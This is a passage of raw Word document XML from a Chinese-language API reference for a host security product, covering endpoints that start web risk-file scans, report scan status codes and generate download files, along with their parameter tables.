              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="777C4116" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>最后修改时间：时间戳，精确到秒</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="71B75DFF" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="651668E1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>download</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27C27228" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69A22A04" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D32D238" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否可下载</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="35A0B865" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="229DED8F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>whiteRuleEffect</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FAF4C69" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23131A3C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2EE22B37" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否命中白名单</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="71CEC53E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="209" w:name="_Toc115166179"/>
      <w:bookmarkStart w:id="210" w:name="web风险文件扫描"/>
      <w:bookmarkEnd w:id="208"/>
      <w:r>
        <w:t>Web风险文件扫描</w:t>
      </w:r>
      <w:bookmarkEnd w:id="209"/>
    </w:p>
    <w:p w14:paraId="2471D176" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口提供web风险文件执行扫描任务。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7D721C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108F78A3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>websecurity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>weakfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux|win</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}/check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B13BE3C"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BC669E" w14:paraId="4F63ADD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F75E666" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1914D8C2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4FCC4E23" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6BDE6F60" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="56AA4D2E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E10BD3D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2338A67A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F575D94" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65ADC6A3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>0/1/2 全部主机/agent范围/业务</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>组范围</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="460982D7" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E5FC21D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>agentIds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AA6BBAA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="097A162B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>如果type为1 必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2BB125F2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="26421F57" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75ED4858" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>group</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2AFD5ACC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5490FD47" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>如果type为2 必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59517D56" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组id范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="51B910F0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CBBA34" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>agentIds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"94e4c7a4f5dec750"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B32FC2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3C21A1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "flag": true</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE31CF2"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630"/>
        <w:gridCol w:w="1006"/>
        <w:gridCol w:w="1070"/>
        <w:gridCol w:w="2095"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="77BBD0C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6DA2244" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="596166F0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08B6F609" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E095982" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="17A2BB9E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B463CFC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="509E7AC5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6AD8AEB5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15B3391D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>true:成功 false:失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="59046B12" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="211" w:name="_Toc115166180"/>
      <w:bookmarkStart w:id="212" w:name="web风险文件查询扫描状态"/>
      <w:bookmarkEnd w:id="210"/>
      <w:r>
        <w:t>Web风险文件查询扫描状态</w:t>
      </w:r>
      <w:bookmarkEnd w:id="211"/>
    </w:p>
    <w:p w14:paraId="198C871B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口提供web风险文件扫描任务的状态查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F27CA0F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747F8494" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>websecurity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>weakfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux|win</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}/check/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>status</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5B0E0784" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44434691" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F70CEE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B7E1A7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>websecurity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>weakfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/check/status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04587952" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5132F45D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>retcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 3</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD568C1"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941"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1070"/>
        <w:gridCol w:w="7175"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="023FD52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8208D34" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73D5DC9A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E7D028B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CD77F6A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0A1E878F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65E13C97" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>retcode</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CDE5DA1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49BA9BC4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16F68379" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>-1-无任务；0-未开始执行；1-排队执行；2-正在执行；3-执行成功；4-执行失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5043412E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="213" w:name="_Toc115166181"/>
      <w:bookmarkStart w:id="214" w:name="生成下载文件"/>
      <w:bookmarkEnd w:id="212"/>
      <w:r>
        <w:t>生成下载文件</w:t>
      </w:r>
      <w:bookmarkEnd w:id="213"/>
    </w:p>
    <w:p w14:paraId="3F285F72" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口提供web风险文件的生成。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE27B2C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9C09E6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>websecurity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>weakfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux|win</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}/download</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563477E6"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630"/>
        <w:gridCol w:w="630"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="840"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="0D8EFD9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5E88700" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
